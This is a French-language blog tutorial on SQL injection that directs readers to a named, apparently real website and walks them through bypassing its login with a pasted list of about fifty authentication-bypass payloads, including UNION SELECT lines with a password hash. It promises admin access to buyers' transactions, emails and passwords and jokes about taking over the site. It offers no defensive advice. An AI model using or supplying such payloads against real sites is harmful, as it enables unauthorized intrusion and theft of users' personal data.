D'abord c'est quoi l'injection SQL ?
La faille SQLi, abréviation de SQL Injection, soit injection SQL en français, est un groupe de méthodes d'exploitation de faille de sécurité d'une application interagissant avec une base de données. Elle permet d'injecter dans la requête SQL en cours un morceau de requête non prévu par le système et pouvant en compromettre la sécurité.
Il existe plusieurs types d'injection SQL
Celles que nous allons Effectuer, est une Injection SQL très connue du Monde du Hacking, Il s'agit là de l'injection sur des failles des sites en ASP !
_______________________________________________________________________________
Sans toute fois perdre du temps on va commencer:
On va sur ce site http://reap.com.pk qui est l'un des sites vulnérables. Je pouvais choisir un autre mais celui ci est vulnérable à 200 pour-cent 😂😂😂😂😂 et je vais contacter l'admin pour la sécurité du site.
Quand nous sommes dans le site, on essai de se connecter au site avec n'importe quel Identifiant ou Mdp et on voit qu'on a pas acces au compte et là c'est à nous de jouer.
Alors maintenant on va réessayer avec une petite Injection de txt dans la base de donnée pour passer utilisateur root/Admin du site.
Ligne à coper:
or 1=1
or 1=1—
or 1=1#
or 1=1/*
admin' —
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'—
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1—
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'—
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'—
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" —
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"—
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1—
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"—
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"—
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
copiez une ligne et collez ça dans Reap ID et dans Mot de passe : admin' or '1'='1. Maintenant tapez entrez et automatiquement vous serez connecter au site en tant qu'Admin et avec tout les droits , vous pourrez modifier les mots de passes , voir les autres user et leurs mots de passes etc
la vous etes Admin et vous pouvez consulter les transactions des acheteurs, obtenir leurs mails , leurs mots de passes etc
cette méthode est très simple
Vous pouvez meme vous approprier le site comme je vous connais, les sorciers peuvent meme changer de serveur mais je vous déconseille ca car je vais recuperer le site
NB: Cette méthode est une des méthodes que je proposerai dans ma formation Complète de SECURITE INFORMATIQUE de stage de VACANCE que j'ai lancé dans la ville de yde✅
Vous l'avez vu vous meme , elle est simple et efficace !
Il existe pleins d'autres méthodes pour Effectuer des Injections SQL , partagez la PAGE FACEBOOK au max et je ferai encore plus de tutos simple et complets biensure 🚩
Quand vous maîtriserez cette simple méthode vous serez capable de la reproduire en 5 Secondes 😁
VSP DEV est un site de référence pour les internautes surtout les hackers et anti-hackers car dans VSP Site on démontre les moyens de hacker et les moyens aussi d’éviter de se faire hacker.Ce blog à été concu par un jeune programmeur et concepteur de dispositifs électronique, dans le but d'aider toutes personnes pationnées des outils informatique.
lundi 28 mai 2018
Inscription à :
Publier les commentaires (Atom)
Anciennes publications
-
De nouveau dans le monde du HIGH-TECH nous vous pressentons un nouveau logiciel qui va permettre de partager la connexion de notre Ordinat...
-
Aujourd'hui je vais vous montrer comment activer OFFICE sur les PB Hev. D'abord je tiens à vous dire que les Ordinateur de notre ...
Aucun commentaire:
Enregistrer un commentaire